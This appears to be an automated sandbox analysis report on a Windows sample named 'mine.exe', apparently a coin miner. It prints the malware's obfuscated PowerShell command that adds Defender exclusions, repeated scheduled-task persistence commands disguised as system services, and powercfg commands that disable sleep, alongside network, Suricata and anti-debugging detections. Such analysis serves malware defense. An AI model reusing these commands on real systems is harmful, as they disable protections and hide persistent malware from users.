Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Dec. 21, 2022, 9:45 a.m. | Dec. 21, 2022, 9:47 a.m. |
-
mine.exe "C:\Users\test22\AppData\Local\Temp\mine.exe"
1344 -
cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFkAVQB6AFgAYwBqAGUAWgBKAFQASwByACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgBFAFQATQBTAGYAdgBBAHYAbABqAGkAUQByAEYAcwBSAE4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGgAeABhAHEAVAB3AGEAZwBWAHYAZgAjAD4AIABAACgAIAA8ACMAZQBHAFcAQgBRAEQATABDAHoATgBRAFUAQwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZgBqAEgARQBtAGYATABZAEYASABxAGwAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAGQAUQBDAHMAZQBwAEYAdQBnAHoAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAEYAVwBFAEwAbwBCAFkAWgBjAFcAdgBaAGkAQwBXAFAAVABPACMAPgA="
2760-
powershell.exe powershell -EncodedCommand "PAAjAFkAVQB6AFgAYwBqAGUAWgBKAFQASwByACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgBFAFQATQBTAGYAdgBBAHYAbABqAGkAUQByAEYAcwBSAE4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGgAeABhAHEAVAB3AGEAZwBWAHYAZgAjAD4AIABAACgAIAA8ACMAZQBHAFcAQgBRAEQATABDAHoATgBRAFUAQwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZgBqAEgARQBtAGYATABZAEYASABxAGwAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAGQAUQBDAHMAZQBwAEYAdQBnAHoAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAEYAVwBFAEwAbwBCAFkAWgBjAFcAdgBaAGkAQwBXAFAAVABPACMAPgA="
2816
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2924-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2980
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
3020-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
1836
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2108-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2264
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2252-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2300
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2052-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
1692
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2716-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2392
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2860-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2712
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
3036-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2156
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
1700-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2292
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2420-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2772
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2056-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2432
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk237" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2956-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk237" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2744
-
-
cmd.exe "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2164-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
2488
-
-
cmd.exe "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
1792-
powercfg.exe powercfg /x -hibernate-timeout-ac 0
2776 -
powercfg.exe powercfg /x -hibernate-timeout-dc 0
2736 -
powercfg.exe powercfg /x -standby-timeout-ac 0
1228 -
powercfg.exe powercfg /x -standby-timeout-dc 0
3024 -
powercfg.exe powercfg /hibernate off
2668 -
schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f
1984
-
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.216.159.81 |
www.google.com | 142.250.206.196 | |
rentry.co | 107.189.8.5 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49166 -> 107.189.8.5:443 | 906200022 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49164 -> 142.250.199.100:80 | 2036303 | ET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check | A Network Trojan was detected |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49166 107.189.8.5:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=rentry.co | 2d:32:02:f6:8b:05:00:17:50:4e:3e:07:e6:23:ea:b6:6a:9a:b8:34 |
suspicious_features | GET method with no useragent header | suspicious_request | GET http://www.google.com/ |
request | GET http://www.google.com/ |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk237" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | powershell -EncodedCommand "PAAjAFkAVQB6AFgAYwBqAGUAWgBKAFQASwByACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQgBFAFQATQBTAGYAdgBBAHYAbABqAGkAUQByAEYAcwBSAE4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGgAeABhAHEAVAB3AGEAZwBWAHYAZgAjAD4AIABAACgAIAA8ACMAZQBHAFcAQgBRAEQATABDAHoATgBRAFUAQwAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZgBqAEgARQBtAGYATABZAEYASABxAGwAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAGQAUQBDAHMAZQBwAEYAdQBnAHoAYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBSAEYAVwBFAEwAbwBCAFkAWgBjAFcAdgBaAGkAQwBXAFAAVABPACMAPgA=" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
section | {u'size_of_data': u'0x0005c400', u'virtual_address': u'0x00007000', u'entropy': 7.879024181426126, u'name': u'.data', u'virtual_size': u'0x0005c3e4'} | entropy | 7.87902418143 | description | A section with a high entropy has been found | |||||||||
entropy | 0.921348314607 | description | Overall entropy of this PE file is high |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk237" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
buffer | Buffer with sha1: 00da052e4e95eeaea8c13e16842cdea5ffdf3f20 |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk328" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk115" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk237" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /f |